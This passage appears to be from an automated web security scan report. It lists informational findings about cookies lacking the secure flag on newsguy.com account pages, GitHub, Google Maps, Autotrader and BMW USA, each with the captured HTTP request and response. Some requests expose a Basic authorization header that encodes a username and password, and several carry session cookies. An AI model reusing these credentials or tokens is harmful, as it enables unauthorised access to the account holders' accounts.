Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

8.8. https://acc.newsguy.com/user/-/accnt_history

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_history

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

8.9. https://acc.newsguy.com/user/-/customer_referrals

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/customer_referrals

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

8.10. https://acc.newsguy.com/user/-/referrals_cashout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

8.11. https://acc.newsguy.com/user/accnt_overview

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_overview

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

8.12. https://acc.newsguy.com/user/accnt_renew

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_renew

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

8.13. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...

8.14. https://acc.newsguy.com/user/accnt_signup_usenet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

8.15. https://acc.newsguy.com/user/accnt_upgrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_upgrade

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

8.16. https://github.com/DataSift/TweetMeme-Chrome-Extension

Summary

Severity:   Information
Confidence:   Certain
Host:   https://github.com
Path:   /DataSift/TweetMeme-Chrome-Extension

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:00:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "ed993b0b64e19e7dbc6254707982dc48"
X-Runtime: 124ms
Content-Length: 40811
Set-Cookie: csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
Set-Cookie: _gh_sess=BAh7BzoRbG9jYWxlX2d1ZXNzIgdlbiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--e0bd7516c66d61afc1315d8c70aa3e9910534a77; path=/; expires=Fri, 01 Jan 2021 00:00:00 GMT; secure; HttpOnly
Cache-Control: private, max-age=0, must-revalidate


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

8.17. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

8.18. https://sell.autotrader.com/syc/syc_center.jsf/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sell.autotrader.com
Path:   /syc/syc_center.jsf/x22

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • BIGipServersell=1753538570.47140.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /syc/syc_center.jsf/x22 HTTP/1.1
Host: sell.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:24 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServersell=1753538570.47140.0000; path=/
Keep-Alive: timeout=30
Content-Length: 216

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /syc/syc_center.jsf/x22 was not found on this server.<P>
...[SNIP]...

8.19. https://www.bmwusa.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=UhmMf4pGAIGE3YTDimr5qpIoTBHmwhxAYkpY6FXQZsjsK8I-ZqVjCRQO3df8XUyuJtngRgB9HKWNLzF6c_n7ziqREw1V-qezTqpq1_AxFS77UoW0uG3VZ2TJGKX1-La1VBhilu45gcGoEftXkrZcay97fFto7jDpifD5PYt_8VVwD_IM9POySKnOwhgQCQ-GwEjTWvZM7u62v46uYW3ihZtKSsU1&t=3a010726 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:24 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/
Content-Length: 6794

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.DropShadowBehavior = function(element) {
AjaxControlToolkit.DropShadowBehavior.initializeBase(this, [element]);this._opacity = 1.0;t
...[SNIP]...

8.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fNaN&Scheme=http HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 231
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:15 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSecured%2fContent%2fForms%2fLogin.aspx%3fenc%3dmwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK">h
...[SNIP]...

8.21. https://www.bmwusa.com/Secured/NaN

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:14 GMT
Connection: keep-alive
Set-Cookie: WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

8.22. https://www.bmwusa.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=8vmmyJUcpAfwePI_vHjEZZzhNQ4xywI20eg8QPHXCFBLoYaZ-iotmrKPGOJcOPcKed2_9fi23ApLsbhQEjklRH9c1X-oNneXtDyJTnRsg1VCv4iu3joe2IkWTU-4dZUwd23uy7A-b_tZvv0ORXw7vC3BngAxxyWWKj2hWy2J5tMQ-eZXm9EI_5o6ZyuhxuFVQyt7rw2&t=634188751465741492 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 38101
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 25 Jan 2011 15:19:30 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/

var __aspxInvalidDimension=-10000;var __aspxInvalidPosition=-10000;var __aspxAbsoluteLeftPosition=-10000;var __aspxAbsoluteRightPosition=10000;var __aspxMenuZIndex=20000;var __aspxPopupControlZIndex=1
...[SNIP]...

8.23. https://www.bmwusa.com/jsenvconst.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
